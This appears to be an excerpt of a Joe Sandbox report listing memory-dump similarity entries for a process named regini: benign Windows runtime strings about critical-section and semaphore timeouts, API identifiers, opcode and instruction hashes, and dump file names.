                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036A02BD
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036A02E7
                                                                    • RTL: Re-Waiting, xrefs: 036A031E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    Strings
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036A7B7F
                                                                    • RTL: Resource at %p, xrefs: 036A7B8E
                                                                    • RTL: Re-Waiting, xrefs: 036A7BAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036A728C
                                                                    Strings
                                                                    • RTL: Resource at %p, xrefs: 036A72A3
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036A7294
                                                                    • RTL: Re-Waiting, xrefs: 036A72C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 8edeca601ea4a759b4c086f9f8f7649fbcba605dedc01de4e5f67ee9678e7d4d
                                                                    • Instruction ID: 65ff56dca9309c5a90c73e9b85762627acf13fb668212e920e3419a28d3038a9
                                                                    • Opcode Fuzzy Hash: 8edeca601ea4a759b4c086f9f8f7649fbcba605dedc01de4e5f67ee9678e7d4d
                                                                    • Instruction Fuzzy Hash: 98318876A016199FCB20EF29CD50BEEB7BDEB44610F54495AE849D7200EB309A488F60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction ID: f82a028039bac5f867c5f5652d00895fb62e3b3093866cae76172b3a19d50c72
                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction Fuzzy Hash: 8691C470E0021A9BDF24DF69CA81ABEB7B5FF44320F98461AE865E73C0D7349942CB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                                                    • Instruction ID: 807ae5e144d08af22ae12aa8f1ad19beb77c177cd9253d130fb62a99f8eed811
                                                                    • Opcode Fuzzy Hash: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                                                    • Instruction Fuzzy Hash: E7813A76D002699BDB31DF54CD54BEABBB8AF08710F0445EAE909B7280D7709E81CFA4